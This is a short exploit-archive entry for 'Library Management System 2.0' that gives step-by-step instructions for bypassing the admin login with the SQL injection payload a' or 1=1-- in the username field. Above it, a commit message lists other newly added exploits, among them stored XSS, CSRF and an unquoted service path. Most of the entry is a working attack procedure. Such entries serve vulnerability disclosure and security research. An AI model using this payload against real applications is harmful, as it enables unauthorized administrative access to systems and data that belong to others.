42b9ff04f0
7 changes to exploits/shellcodes PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path Barcodes generator 1.0 - 'name' Stored Cross Site Scripting OpenCart 3.0.3.6 - Cross Site Request Forgery Openfire 4.6.0 - 'path' Stored XSS Library Management System 2.0 - Auth Bypass SQL Injection WordPress Plugin Popup Builder 3.69.6 - Multiple Stored Cross Site Scripting
21 lines
No EOL
719 B
Text
21 lines
No EOL
719 B
Text
# Exploit Title: Library Management System 2.0 - Auth Bypass SQL Injection
|
|
# Date: 2020-12-09
|
|
# Exploit Author: Manish Solanki
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/6849/library-management-system.html
|
|
# Software Link: https://www.sourcecodester.com/download-code?nid=6849&title=Library+Management+System+in+PHP%2FMySQLi+with+Source+Code
|
|
# Version: 2.0
|
|
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
|
|
|
|
#Vulnerable Page: admin page
|
|
|
|
#Exploit
|
|
Open the Application
|
|
check the URL:
|
|
http://localhost/eb_magalona_lms
|
|
|
|
Open Admin Login
|
|
Enter username: a' or 1=1--
|
|
Enter password: '
|
|
|
|
click on login
|
|
The SQL payload gets executed and authorization is bypassed successfully |